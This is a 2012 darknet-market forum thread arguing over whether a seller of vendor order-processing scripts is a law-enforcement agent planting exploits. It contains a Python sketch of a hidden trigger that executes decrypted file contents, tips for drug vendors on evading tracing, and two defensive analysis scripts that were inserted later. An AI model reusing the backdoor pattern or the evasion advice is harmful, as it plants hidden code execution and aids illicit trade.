I'm still looking for a way to have the software properly audited without simply becoming your/SR code slave.

I'm also still interested to know if there are *any* other Python coders reading this forum.  So far it only appears to be me, in which case posting the code doesn't result in an audit, it just results in me giving away my work for free.

*pine explains the idea of the character encoding exploit

I think you're misunderstanding what it does with encrypted data.  It's simply writing encrypted messages to multiple files and then calling GPG to decrypt them all simultaneously.

You're implying we should take your word for it, that the program does what you say it does. You can "explain" what your program does all day long, but you could be lying. This really is kindergarten stuff.

"It does X" - person 1
"You could be lying for all I know" - person 2
"Let me explain how it all works" - person 1
"..." - person 2

I've already posted the entire decryption command, both the bash and Python versions.  It's the same as running "gpg file.txt.asc" except for more than one file.

The only way I can think of to do something dodgy there would be similar to the JPG thing by inserting something which self-executes upon decryption (which would require customising the compression software and/or GPG prior to encryption).  Mind you, executing that kind of attack wouldn't need something like SROPPy, it would just need sending a vendor an encrypted message.

Which brings us back to my earlier point, made multiple times now, that there are better vectors for attack if that's your aim.

That aim is not my aim and never has been.
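
Added example, not part of the original thread: a check for the character-substitution channel pine describes in the post above, run over outgoing plaintext before it is sent. The sample message is constructed and the function names are assumptions of this example; it also flags invisible format characters, which goes slightly beyond the lookalike letters the post mentions.

```python
import re
import unicodedata

# Constructed sample: reads as plain English, but carries two Cyrillic
# lookalike letters and one zero-width space.
SAMPLE = "P\u0430ckage sent today,\u200b tracking to f\u043ellow.\nRegards"


def script_of(ch):
    """Rough script label: the first word of the character's Unicode name."""
    name = unicodedata.name(ch, "")
    return name.split(" ")[0] if name else "UNKNOWN"


def find_suspect_chars(text):
    """List every character outside printable ASCII (tab, CR and LF allowed).

    Returns tuples of (line, column, codepoint, Unicode name, category).
    """
    findings = []
    line, col = 1, 0
    for ch in text:
        if ch == "\n":
            line, col = line + 1, 0
            continue
        col += 1
        if ch in "\t\r" or " " <= ch <= "~":
            continue
        findings.append((line, col, "U+%04X" % ord(ch),
                         unicodedata.name(ch, "UNNAMED"),
                         unicodedata.category(ch)))
    return findings


def mixed_script_words(text):
    """Words whose letters come from more than one script, e.g. Latin + Cyrillic.

    A single foreign letter inside an otherwise Latin word is the typical
    shape of a lookalike substitution.
    """
    hits = []
    for word in re.findall(r"\w+", text):
        scripts = {script_of(c) for c in word if c.isalpha()}
        if len(scripts) > 1:
            hits.append((word, sorted(scripts)))
    return hits


def is_clean(text):
    """True only if the text is pure printable ASCII plus tab/CR/LF.

    Limitation: lookalikes that are themselves ASCII (l / I / 1, O / 0),
    spacing and word choice are not covered by this check.
    """
    return not find_suspect_chars(text)


if __name__ == "__main__":
    for line, col, cp, name, cat in find_suspect_chars(SAMPLE):
        print("line %d col %d: %s %s (%s)" % (line, col, cp, name, cat))
    for word, scripts in mixed_script_words(SAMPLE):
        print("mixed-script word %r: %s" % (word, ", ".join(scripts)))
    print("clean" if is_clean(SAMPLE) else "NOT clean: do not send as-is")
```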
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 10, 2012, 08:44 pm
To avoid sneaky tricks, the rule is simple and highly efficient. Don't trust software from anonymous sources with extreme prejudice with the exception of the specific situation kmfkewm has mentioned. And even then you have to watch it. The forum could be populated by 1001 people and 1000 of them could be sock puppets. LE have used such software on carding forums and the like with great effect before now.

Then don't buy it.  I'm not forcing anyone to, it's their choice.

This is about security, not some kind of "quality control" issue. As many people can buy your software as they like, but they should be informed of how hazardous that proposition could be, hence this thread.

This thread isn't about investigating whether or not SROPPy is secure, that's merely a part of it.  It's also about tarring and feathering me.  If you'd just wanted answers you could have at least started with a PM, but you didn't, instead you went to DPR to get me shut down and when that didn't work you went for a public attack and smear campaign.  Don't believe your own hype.

There are far better vectors for attack on this site than a handful of scripts that can be read before they're run or run on a disconnected system.

Seriously, if I wanted to do that I'd be planting malicious code in a compressed file that was automatically loaded, like a JPG for example.  Put it in an avatar and then make a post attacking a particular vendor to lure that vendor into an argument and force them to load it.

This is nowhere near as simple as you're claiming. Image based exploits exist. But if it was as trivial as you're implying, it would have already been done a long time ago indeed.

I never said it was trivial.  I said the strategy behind that kind of attack makes more sense for the cops to employ than what you're asserting I've done by offering some code for sale.

Yes, there is, but I'm not forcing anyone to buy or use this.  I am providing a product which some vendors may elect to purchase and use and others may choose not to.  It's a free market.

This is.. beside the point. Forcing people to do things isn't even a possibility on here. This is a strawman argument, you're pretending my arguments are something other than what they are.

While you're pretending that I am someone I'm not and that my code is something it's not just because I don't do what you tell me to do.

I have already described at least 3 different attacks in this one post alone that you cannot possibly address in your description of what you say is happening because the code is not capable of being properly audited. Any programs from anonymous sources need to be visible on the forum period.

One of which requires network access, which is not required by the program.  One involves a false assumption about the use of cryptography in the script (it calls GPG *once* with a decryption command).  The last requires planting a backdoor in any of the following: Python (probably already on your system, if it's compromised you're already fucked), Bash (same as Python), GPG (extensively audited already) or HTMLDOC (if you're worried, skip that part).

Once more, you are not even implying it here, you are saying it outright, that we should trust you. This is your original sin.

Original sin?!  Oh please ... no one has to even trust me.  All they have to do is hook up an old PC with no network connectivity and a printer if that's still a concern after buying it.

I seem to remember that your advertisement had *no* caveats about getting somebody else to verify the code against your claims. I seem to remember your advertisement had *no* caveats about using a checksum to make sure you didn't do a bait 'n switch with your program.

If I'd made a dodgy version of the code then all I'd have to do is post the hashes of the dodgy version which would, of course, then match when a user checked them.  So that means sod all.

*Everything* you said about that only came after this thread. So we have no evidence you had any plans at all to perform any double checking of any kind whatsoever. Whether they would actually work isn't even the question, it's that you apparently thought vendors would merrily download your software without checking it was without exploitation. The vendor that acquired the code from you, if this vendor is actually indeed real and not just a sock puppet, if they did not carefully audit the code, then the vendor is either naive or an idiot.

Definitely not a sock puppet, they've been here for a lot longer than I have.

The only proof I can provide, though, is the payment I received for the proof-of-concept shell script which was posted earlier.  That payment is here:

http://blockchain.info/tx/8adb275fdb11f82349e98adfcb34a17caea53091e48afbc46f3c0b9d9d4f0a43

This is the entire point of this thread. Depending on trust in a single anonymous person's judgement is a recipe for a complete catastrophe for your operational security i.e. Do not pass Go, go to Jail.

It doesn't even need trust, see above.

I can't be 100% certain, but reading material on image exploitation, you quickly come to the understanding that doing one would likely have to involve the use of a zero day exploit. Even if it were not at that level of difficulty, it's definitely somewhere in that ballpark. How do I know? Because I'm typing this right now and am not in police custody. If it were easy to do, LE would have already done it to everybody on SR.

Once again, I never said it would be easy.  I said that the strategy behind such an attack makes more sense than what you're claiming I'm doing.

The LE accusation only holds true if the code can somehow report on users, which it doesn't. 

We really have no way to know that without the code being placed on this forum. Your attitude is from the get-go that we should take your word for it.

And your attitude from the get-go has been completely paranoid, accusatory and frankly offensive.  I'm also now convinced that even if and/or when the code is posted to the forums (which frankly I wouldn't trust for a real security audit, with one or two very rare exceptions) that you'd still come up with some reason to stick to your attack.

Yes, you're correct.

My attitude is paranoid because you have to be to survive here. I am accusing you of very suspect LE-like behaviour and it's completely irrelevant to the discussion whether me accusing you of being a LE agent hurts your feelings.

My feelings?  No.  But you're attacking my reputation and even though this is a pseudonym I feel it is worth defending.

You may notice that I haven't, for example, given either you or Kmf any negative karma for what's happened in this thread.

If the drug war ends, and it turns out that you were not a LE agent after all, but a python programmer with a lack of introspection who intended to do the right thing, then I will personally give you five hundred US dollars to recompense you for lost custom and aggravation, along of course with a sincere apology. Unfortunately this is unlikely for reasons beyond our control.

It is unfortunate, you'd be down $500, but I'd want that apology in writing and signed.

Today's situation is that you look extremely guilty to me.

As the old saying goes, looks can be deceiving.

Of course it wouldn't make a jot of difference if you posted code to the forums. We *have no* way to know it was the code or a version with the exploit edited out of it.

Not rocket science!

So you can make this argument about posting code to the forum, but can't see how it applies to checksums.  That makes it look like you're only applying logic where it supports your argument.

The thread is not about pine trying to get free software out of some open source fanatical resolve, it is about the very great difficulty of trusting somebody who has acted in a very suspicious way.

Once again, trust is not required.

As for auditing the code, find me a decent Python programmer on Silk Road and I'll talk to them about auditing it.

It can quite easily run on a completely disconnected system.  It makes no difference to the program.

Like I said to Sands, this is basically impossible because it's impractical for vendors without appropriate utilization of an Air Gap.

Then they should employ one.  Seriously, some old cheap PC with no USB and all the ethernet ports ripped out running a bare minimum install.  Data transferred to it via read-only media and no data EVER transferred off it and it's done.  How much would it cost using hardware from 6 or 7 years ago?  Fifty bucks?  A hundred?

If as a result of this thread every vendor went and got an Air Gap, I would be flabbergasted. Delighted, but in some kind of shock.

Sounds like a good basis for another project in the Security forum along the same lines as PGP Club.

Every time a vendor has to make a reply to a customer, they have to burn data to 2 read only DVD/CDs. Once to find out what the message was, once to make the reply.

While it is obviously the case a vendor could make 'batch replies' or 'batch reads' if not replying, you are trivializing what is a serious amount of work and more importantly the delay in responding to customers. You're also missing the fact that a great many vendors are transient vendors, not permanent fixtures to the marketplace, in fact the majority of them are probably temp vendors rather than in it for the long haul.

This only holds if using the bash script I posted in this thread on, I think it was the second day (I can't tell you which page because I changed my settings to display 25 posts per page a while back).
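
Added example, not part of the original thread and not SROPPy's code: a first-pass static triage of a Python script that lists what it imports, which external commands it launches and whether it evaluates code at run time, the questions argued over in the post above (network access, how GPG is called). The sample script and all function names are constructed for this example; a clean report narrows where an auditor reads first and does not prove a script is safe.

```python
import ast

NETWORK_MODULES = {"socket", "ssl", "urllib", "urllib2", "httplib", "http",
                   "ftplib", "smtplib", "telnetlib", "xmlrpc", "requests"}
PROCESS_CALLS = {"os.system", "os.popen", "subprocess.call", "subprocess.run",
                 "subprocess.Popen", "subprocess.check_call",
                 "subprocess.check_output"}
DYNAMIC_CALLS = {"eval", "exec", "compile", "__import__"}

# Constructed stand-in for a script under review (hypothetical file names).
SAMPLE = '''\
import glob
import subprocess as sp
from os import system as run

files = glob.glob("inbox/*.asc")
sp.call(["gpg", "--decrypt-files"] + files)
run("lpr labels.txt")
exec(open("plugin.py").read())
'''


def dotted_name(node):
    """Turn an ast.Name / ast.Attribute chain into 'a.b.c' ('' otherwise)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def literal_argv(call):
    """First argument of a call if it is a pure literal, else None.

    None means the command line is assembled at run time, so the auditor
    has to trace by hand what can reach it.
    """
    if not call.args:
        return None
    try:
        return ast.literal_eval(call.args[0])
    except (ValueError, TypeError):
        return None


def triage(source):
    """Summarise imports, process launches and dynamic evaluation.

    ast.parse uses the grammar of the interpreter running the audit, so the
    script must parse under that Python version.
    """
    tree = ast.parse(source)
    report = {"imports": set(), "network": set(), "process": [], "dynamic": []}
    aliases = {}  # local name -> real dotted name, to see through "as" renames
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                top = a.name.split(".")[0]
                report["imports"].add(top)
                aliases[a.asname or top] = a.name if a.asname else top
        elif isinstance(node, ast.ImportFrom) and node.module:
            report["imports"].add(node.module.split(".")[0])
            for a in node.names:
                aliases[a.asname or a.name] = node.module + "." + a.name
    report["network"] = report["imports"] & NETWORK_MODULES
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = dotted_name(node.func)
        head, _, rest = name.partition(".")
        if head in aliases:
            name = aliases[head] + ("." + rest if rest else "")
        if name in PROCESS_CALLS:
            report["process"].append((node.lineno, name, literal_argv(node)))
        elif name in DYNAMIC_CALLS:
            report["dynamic"].append((node.lineno, name))
    report["process"].sort(key=lambda item: item[0])
    report["dynamic"].sort()
    return report


if __name__ == "__main__":
    result = triage(SAMPLE)
    print("imports:", sorted(result["imports"]))
    print("network modules:", sorted(result["network"]) or "none")
    for lineno, name, argv in result["process"]:
        print("line %d: %s -> %r" % (lineno, name, argv))
    for lineno, name in result["dynamic"]:
        print("line %d: dynamic evaluation via %s()" % (lineno, name))
```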
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 10, 2012, 09:04 pm
In this instance, it is impossible for me, or anybody else, to validate your claims about this software. That is the single most important fact, and no amount of Cyphere Software Apologists are going to make that go away.

Yet there are ways for anyone who buys it to do so.  Not to mention the fact that if it were to fail such an audit they could get my account suspended by SR.

What? So it costs 150 dollars and an LE agent becoming a member of the community per exploitation delivery? I think a LEA would be quite happy with that kind of return on investment to be honest. Don't talk as if you've a lot to lose if my suspicions are correct. You don't.

Well, since your suspicions are not correct, I don't have a taxpayer funded law enforcement budget.

And explaining those away still doesn't achieve the main objective you should have had from the onset. There is basically no way to "decriminate" yourself in fact.

Which proves the point I made above, you've made up your mind and there's nothing I can do to change that.  As I said, even if I were to post all the code now you'd still think I was up to something.

What I have made my mind up about, is that your actions are incredibly suspect and lead me to believe you could be a LE agent. Of course this cannot ever be proven on an anonymous forum. And as I said before, that posting the code is irrelevant is merely a statement of the obvious.

And if I had given the code away for free by posting it to the forum then it wouldn't have been "sketchy"?  Even if there's no one here capable of auditing it?

Your statements here are a logical fallacy, what in debating is called "Tu Quoque". In English, you think that by answering a criticism with a criticism, that you are engaging me, when in fact you're avoiding the main point which is that we can't trust people who have sketchy behavior.

Oh, I'm answering your arguments, I'm also levelling my own criticism.  Those two things are not mutually exclusive, much as you might wish it were otherwise.

If your response was along the lines of "I am not a LE agent, but I can see that this looks a bit suspect to you because if I were hypothetically LE I could be trying to deliver an exploit, in future I will do X {checksum/ do proper independent audits, make it publicly available} so that the software could be validated against containing exploits"

As it happens, between your own logic disconnects, I can see some points of concern.

Checksums were considered originally, but as I've stated they only help me to prevent a future possibility of being framed.  A proper independent audit would be great if there were someone here capable of doing it.  Giving away my work for free is out until I can devise a new business model which can address that that's not some useless tip jar.

then I would be still mad that you didn't think of the necessity of software auditing on a forum of criminals, but nowhere near as mad as I am now, because your position is essentially this, when you take out the verbiage:

"Hi, I'm LouisCyphre, you all know me so you already know I'm ok, my software is totally legit because I could have hypothetically done one of the things I mentioned above (but didn't) but don't worry because if you get arrested because it contained an exploit you can always tell DPR to suspend my account, LOL free market FTW, eh?!"

Which brings us back to employing an air gap or just not buying the software.

Not quite.  The really low hanging fruit is the vendors using Windows systems and I haven't ported it to Windows yet.  I'm certainly not inclined to right now.

This is pretty much the only argument you've made I agree with thus far.

Frankly I think no vendor in their right mind should be using Windows.  Actually, no one here should be.

Having said that, the future of the program is to get rid of the shell scripts and do everything in Python.  At which point it might (would?) run on Windows.  I'll never test that, though, I haven't had a Windows system this century.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: outbacktrippin on September 10, 2012, 09:14 pm
Not only is he providing it under GPL, but he says that it is all shell and python scripts. Scripts are, by their very nature, source code.

^this

OP is clearly a wanker with just enough knowledge to be opinionated but not enough to be informed or accurate about it.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 10, 2012, 09:34 pm
A general point I neglected to mention which may explain some of this situation:

People must understand that DPR isn't necessarily going to be pointing out every possible pitfall and removing them as options. For example, DPR's approach when I brought up the issue of LouisCyphre's program as a security concern for vendors was not "Yes, let's ban him, LE for sure" or "You're probably paranoid, Pine, I mean you think you're a platypus (but this is true)", it was "Go to the forum and have at it, let the vendors themselves decide what is best". This may seem strange, and it did to me at first blush, but I think the general idea, partly at least, is stemming from market based philosophy, is that being overly protective of a market could eventually lead to its downfall if people weren't recognizing 'issues' for themselves, whether or not they got them right or wrong.

That is interesting since DPR already knew what I was doing before I made the listing.  He has not (yet) taken me up on my offer to provide a copy of the code for his own peace of mind.

You're right about the agorist philosophy behind his response too.  You were asking him to regulate the market, which is the antithesis of what an agorist market is.

Actually, after informing DPR of my suspicions, I asked for something quite different.

Which was?

It's even simpler than that:  If you don't want to use it for whatever reason, don't buy it.  If you do, buy it, I'll help you set it up, explain exactly what it does and how, provide best recommendations for secure use and if it turns out I'm fucking with you then you can provide that proof to DPR and he can terminate my account.

That is priceless. So... you're implicitly saying that in the time frame it takes:

A: You to realize this, which you almost certainly won't since that kinda misses the point of a deanonymizing exploit, and
B: The time it takes the police to grab you by the time you realize they are inside the building.

That the vendor will somehow obtain Internet access and dial up SR with a complaint. Because when a criminal is involved in computer based crime, LE agents always give them access to a laptop so he can skype his lawyer or whatever. I mean you're actually right, I cannot believe I did not think of this before.

Hrmm, okay, good point.

And no. So long as the scripts themselves are not ridiculous mountains of tortured spaghetti code (in which case no-one should run it on general principle), there will be no room full of NSA spooks required to vet the code thoroughly. It will be relatively brief. Either it makes network connections, or it doesn't. Either it does unexpected IO, or it doesn't.

This is not true at all.

It is not as simple as a brief Ctrl-F to search for code that makes network connections or examine I/O, finding exploits can be difficult. Myself and kmfkewm have come up with at least two perfectly plausible methods that are difficult to detect, and it's not as if we've spent months and months working out all the angles to make it come good like a real exploit tiger team would be doing.

It does take more than just searching for the obvious, but if all IO operations are found and found to be clean then xollero is right.

In SROPPy all the IO operations are incredibly obvious.  In fact, let's see if there are any other Python coders present, here's one of the files in SROPPy 1.1.  It reads a text file (text-files.list) containing a list of all the .txt files generated by the decryption command, reads each text file (username-transaction_number-address.txt) and then rewrites them as HTML files (username-transaction_number-address.txt.html).  It's one of the largest files in that version (at a whopping 545 bytes).

text2html.py:
Code:
#! /usr/bin/env python

# Copyright (C) Louis Cyphre, 2012
# lcyphre@tormail.org

# Converts address text files to HTML

txtlist = "text-files.list"

lfile = open(txtlist, "rb")
ldata = lfile.readlines()
lfile.close()

for string in ldata:
    tfile = open(string.rstrip(), "rb")
    tdata = tfile.readlines()
    tfile.close()
    nfile = open(string.rstrip()+".html", "a")
    nfile.write("<html><body>")
    for string in tdata:
        nfile.write(string)
        nfile.write("<br />")
    nfile.write("</body></html>")
    nfile.close()


Now let's see if an exploit is buried in there.  By the way, if that doesn't add up to 545 bytes then it just means there were more blank lines at the end, so add carriage returns (in Vim or Emacs) until it does and then check the SHA sum.

As for Kmf's exploit, it made certain assumptions about network connectivity, the level of similarity (or lack thereof) between Ruby & Python and exactly what the --decrypt-files flag does in GPG (he assumed it writes to stdout, which it doesn't).  I'll get back to him later.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 12, 2012, 01:49 pm
Quote
Does the trigger string need to be part of the code or does it just tell the existing code to activate?

It needs to be part of the code, I included it as a comment so that it has no effect on the script but still signals to the original script that it should pipe the plaintext to irb.

Right, well I don't think there would be any way to do it in Python without an if statement, otherwise you'll end up with a lot of error messages being piped to stdout for every address file that did not contain exploit code.  It would need to be inserted after the decryption command (not with it because --decrypt-files reports the results of the decryption process to stdout, but not the decrypted data), but before the checking of the plain text content.  Since there's nothing after decryption in the relevant files, that's easy to spot.

Which means your exploit in Python would be a bit like this:

Code:
import os

path = "."
text_files = [f for f in os.listdir(path) if f.endswith(".txt")]

evilstr = "trigger string"

for string in text_files:
    with open(string, "rb") as searchfile:
        for line in searchfile:
            if evilstr in line:
                os.system("python "+string)
                # report nothing, including any errors
                # requires more code to hide errors
                # plus add even more code to rewrite payload with
                # plain address
            else:
                # do nothing, report nothing
                pass

To do it properly so it never reported any errors to stdout would require enough code to rival the size of the largest file in the software package.  Actually, the above already does, so with the code to hide output of any errors it would be the largest bit of code.

I don't think it would be possible to conceal it, not with the way Python is constructed.  Since all of the above would have to be required to run whatever nastiness is hidden in an encrypted address file.

Spotting that would not be rocket science.  And here's why that is so.

Simply piping all the decrypted data through the Python command would result in a large number of error messages like this (sample text file included):

Code:
bash-3.2$ cat address.txt
Mr. L. Cyphre
666 Hells Highway
Hades
bash-3.2$ python address.txt
  File "address.txt", line 2
    666 Hells Highway
            ^
SyntaxError: invalid syntax
bash-3.2$

So your exploit in Python would either be obvious due to a large amount of very unexplainable code or a large amount of error messages being displayed every time the code is run.

Quote
Well, if pack in Ruby is what I think it is, then to do the same in Python I'd have to import struct (and probably array too).  I've already said several times what modules are imported, so there goes that.

pack changes how data is displayed. For example I could unpack the string "see" into binary representation : "see".unpack("B*") == "011100110110010101100101"
and I could put that in an array and pack it back into a string ["011100110110010101100101"].pack("B*") == "see"

Yep, that's the same as struct.

Quote
Hell, there are only two files with integers in them (to read data in each row of the CSVs).  Well, alright, 5 files if you count the one with a number in the name and the two files that invoke it.  Obviously in the case of those three files the number is part of a string and not an integer.

These numbers are strings also, anything in " " is a string.

Ah, okay.  The "" at least is the same as Python.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: m1ndb3nder2501 on September 13, 2012, 06:33 am
i haven't been following this thread that much but don't u think LE would just set up a bunch of fake buyer accounts and order all over the country using different vendors? like i wouldn't b surprised if DEA has been keeping a profile of all the vendors. i'm not trying to freak anybody out but i'm just saying i think buyers would be the people to be most suspicious of.... no intelligent cop is going to advertise a product regardless of its legality. they're more interested in the packaging methods and return address, WHICH IS WHY ALL OF THESE THINGS NEED TO BE CHANGED REGULARLY. i've made multiple purchases from the same vendors and the outer packing is ALWAYS the same. i thought the whole idea was that it would not be able to be traceable back to anyone, meaning the inner and outer packaging should be constantly changing. but vendors are using the same outer packaging as well as inner packing. so far i've had 2 truly stealthful packages and that was from Northern Dancer (favorite seller on SR) and from reich (who does in fact change his packaging quite often from my observation). anyways yea i'm rambling i'll shut up i just think so many ppl are so paranoid. the usps is BROKE AS FUCK i'm sure they're lettin a lot of shit slide atm.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: THUMBSuP. on September 14, 2012, 08:46 am
shit's crunk like too much junk in the trunk.
i really hope Louis is not LE.
i really hope pine is the boss that we have come to enjoy bossing.
and... kmf is a boss like kkefka from the Final Fantasy series, lol.



sorry... late night roxi30 RANT.
super duper high priest. level85.

hope everyone had an amazing day and an even more amazing night.
sleep tight, all right. all good. life's good.

/thumbs
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: echo_ on September 14, 2012, 10:15 am
sorry... late night roxi30 RANT.
super duper high priest. level85.
All I can say is I'm glad you're here.

/thumbs
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 14, 2012, 10:13 pm
You, sir, are now engaging in the same type of vile and slanderous accusations as Pine.  Your assertion here that my code must contain an exploit because you thought of a way it might be done is as baseless as saying that because paedophiles use anonymous networks then everyone using an anonymous network is a paedophile.  It is a fallacious argument and I believe you know this, now you're just flinging mud in the hope that it sticks.

Get off your high horse.

This is not a courtroom. This is the black market. You did something incriminating. That is more than enough to justify labeling you as a potential LE agent.

And now you're backtracking from definitely an LE agent to potential LE agent.  There's a big difference; it's the difference between suspicion and proof.

You still have no proof and no one has yet analysed any of the code I've posted in this thread.  Which I'll grant isn't the whole package, but the Python code (as distinct from the earlier shell script) is one of the files in version 1.1 of the code you're critical of.

Quote
As such, Louis has the right to market his wares under any conditions that he deems fit.

Nobody really argued that he should be banned from selling it, we are just warning people that it is dumb if they buy it unless the source code is publicly available for all to audit. The type of people who will buy something like this are inherently people who do not know how to properly audit it.

Not true.  Pine tried exactly that before starting this thread.  See this post from her details earlier in this thread:

http://dkn255hz262ypmii.onion/index.php?topic=40934.msg451841#msg451841

That doesn't say I tried to ban you at all. That was just your interpretation of why you think I went to DPR. And it is true, I didn't ask DPR to ban you, I had something quite different on my mind.

I asked to set up a dummy buyer so we could observe what happened in a remote controlled environment, with the intention of following an exploit's comms (if it was that kind of exploit) and tracing it back to the destination IP address, which is almost certainly going to be a DEA office.

That would have been interesting.  I would've loved to have seen the look on your face when you realised it didn't.  Oh well, there's still a chance that someone in your camp will try it on an isolated system.

After some consideration, I agree with DPRs assessment that calling you out in the open about this was more effective on several counts. Not only did it create a discussion interesting in terms of illustrating how exploits can work and spreading some security awareness on that count,

It's certainly an interesting discussion.

but having your RL identity could have turned into more of a problem than a solution.

Or nothing at all.  *sigh*

It might achieve proving you are/aren't a LE agent (no IP),

Yep.

but the downside is that if you are a LE agent, then the temptation of coercion would leak in, not now, but if this war went hot suddenly, it'd be a temptation to retaliate directly, simply because it would be easy and satisfying.

Ah.  Interesting line of thought.

Good thing the only thing in the code that could correlate to me is the coding style, but since it's all very basic code that would lead to a lot of places, including sample code posted to stackoverflow.com, so I'm probably good there.  Some of it came from other GPL projects which I know were influenced by various O'Reilly books (which are very common amongst coders around the globe).

This of course defiles the moral objective of this enterprise. Even LE agents shouldn't have to fear this specter, enough people have suffered and bled for this war already. I would hope there exists an 'anti-pine' on the other side that takes the same view. More pragmatically, it would make this war ever more intractable and draw more resources against the darknet markets, the entire thing could spin completely out of control if we suddenly started with such an active approach.

Yeah, that's fair enough.  Don't worry, though, if someone does try that kind of inverted controlled delivery there's nothing that could result in anti-LE retaliation.

Ah, but this isn't really a review of the product, it's your assertions about it with no evidence.  You already know how to get the evidence to prove one of us right, you're choosing not to.

Also, your MDMA/PMA analogy still depends on someone purchasing the product and testing it.

As repeatedly explained the problem is that there is no way to know what you "intended" to do vs what you choose to show us later on.

Other than doing what you've ruled out above; creating a new account and buying the product.

It is wrong to say that his product IS backdoored. It is wrong to say a vendor's product has been cut with Drano if you have not purchased some and tested it. It is not wrong to say that PMA is dangerous if a vendor is selling PMA.

Yet you have previously stated that my code contains an exploit simply because you thought of a way it could be done.  You have not actually obtained the code and proven that it does contain such an exploit.

I have written the code and stated there is no such exploit.  You have yet to prove that I am lying.

Another major vendor is running the code and has stated that it does exactly what I said it did.  You and Pine have been unable to prove that false.

We don't have to prove anything. You don't get it. The burden of proof is on everybody on SR not to act in sketchy ways.

Then I mistakenly believed that because one vendor approached me to write the code in the first place (after answering an obscure GPG question in a PM) that others might see the value in it too.  Perhaps I erred in this.

If you are not LE, then I certainly know you're new to these markets.

No shit, Sherlock.  I've been here for 3 months.

The burden of proof has always been on the person the question is being asked of. It is up to you to prove your innocence by not acting in incriminating ways rather than the other way around. On the white market, in civilian courts this is the other way around.

That's a good point.

Normally that proof is provided by engaging in illicit activity.  There's a thread around here somewhere which shows that my involvement in teaching people how to use crypto for the express purpose of engaging in illicit activity would be enough to get me bundled off to a US prison (maybe extradited, maybe not) if they knew who I was.  Perhaps I mistakenly believed that was enough to establish my bona fides, but I guess not.

You seem to have the idea that this is supposed to be fair. This is an amazing idea, clearly you are new to criminality.

Hahaha!  :D

The other day I tried to work out how long I'd spend in prison if LE knew who I was and everything I'd gotten up to over the years.  I'll give the traditional "no comment" to that.

It is fair to say that I am new to drug markets like SR, but I've always avoided the ones on the clearnet because operating that openly is pure insanity.

Louis, you could have 1000 reviews, but they could all be LE buyers collaborating with you to form an illusion of reliability. The only way we can see to prove the code that you are giving us, and the code other people are executing, is the same code, is if it comes from the same place i.e. a forum thread on here. Believe it or not, LE agents lie sometimes, even lying about themselves lying. Incredible, I know! Who would have thought them so unscrupulous!

I'm still considering the possibility of posting the whole thing, but I don't particularly want to.  If I did then it would be posted without documentation or code commentary included (which would mean the checksums wouldn't match).  It also wouldn't be supported (and I'd post a service product for doing so at a rate that would lead to me receiving something close to my real life professional rate).  Let's just say that buying the current listing is significantly cheaper than that.

If I am paranoid and 'accusatory' (probably because I'm actually accusing you, no?) then you've been seriously obtuse by pretending many things are more straightforward than they actually are.

Paranoia is just seeing a threat where it doesn't exist, so in this case that's exactly what you are.

Air gaps. -> They are not simple for most vendors to use.

Perhaps, but I don't think they're as difficult to set up as you're making it out to be.  Still, we've gone round and round on this one so the next step is to provide guides in the Security forum to operate an air gap system properly.

You want to make extra money. -> But you intend to sell to what is probably literally SR's smallest market.

True, but it's a good way to see if it is worthwhile spending any time on widening that market.

Computer programming. -> Not everybody is able to follow it, even when explained in detail. Probably because it takes months/years to learn it.

Yes, well that's a fair call.  People are different.

Open source. -> But only non-programmers will be reading the code. I'm sure there's a soviet russia joke in this somewhere.

Still better than trying to sell a precompiled binary.

You guys have to prove I tried to pull off an exploit. -> Except nobody independently generated a checksum since you didn't think to request it in the first place, we have no idea if you're giving the original code. It's not as if one or two people would be enough either, you'd need lots, having auditors signing your program would also work, but both principles are based on the fundamental principle of counting.

And having enough trustworthy auditors willing to participate.  Which appears to be a big stumbling block here.

Well, on a theoretical level I think that everything you said makes sense guru, but on the other hand I feel that your comparison between asking a drug seller to prove their wares and asking a programmer to prove that their software is safe.

The difference is as follows:

1.  It's impossible for a drug seller to really prove that they'll always be shipping something safe.  It's a lot easier for a programmer to prove that their program is safe by releasing it open source etc.

Two problems here:

1)  A programmer could release code that is safe and sell something else.

Holy cow, I think we're getting to you at last!

Meh.  I've always been aware of the issue between selling my work/services vs. working for free and posting the code.  My biggest "crime" here has been wanting something for the effort I've put in (unless you speak to real LE, in which case my biggest crime is providing knowledge and software to aid criminal enterprises).

2)  Releasing the code freely cuts out payment for the work put in, as I've explained previously.

If you're not LE, then that sucks, but there is nothing you can do about it, you just have to deal.

Clearly.

2.  If a drug dealer ships something unsafe then 1 person has a bad reaction.  If Louis widely gives out malware specifically targeting vendors and information regarding their vending then that's a major blow to silk road itself.

That's a big if.  Pine and Kmf have each asserted it does and I've already stated that anyone can purchase the code and post it to the forum.  Until someone does then this is all conjecture and baseless assertions.

This appears to be a problematic concept.

- We are saying that your profile of targeting vendors, esp. large vendors given the price tag, with code they can't read, which was your initial proposition, is very LE-like.
- The above ^, is not evidence you are LE. There is no evidence you are LE as I've already said, it's not actually possible to obtain any. It just strongly implies that you are.

More backtracking.  Your first post was written in a way which basically says there's no other possible explanation.  In conjunction with using your own personal definition of what open source meant.

There is no practical difference between "I think he is probably LE" and "This guy is LE". In RL the reception is the same, and it doesn't change here. The title of the thread is about obtaining hits, because a wishywashy "I think maybe perhaps, sorta, coulda be LE" doesn't quite have the same resonance. I am accusing you of something. This is not equivalent to making a scientifically provable statement. It is called an opinion. You can go create a thread called "Louis is not LE" or something. Same applies.

Finally!  It's nice for you to finally admit that it is just conjecture and opinion.

The big ask, which is NOT on you, is that people think for themselves instead of taking what you or me or anyone else says on faith.  A point which you've already made elsewhere in this thread too.  I don't think either of us will be holding our breath waiting for that to happen.

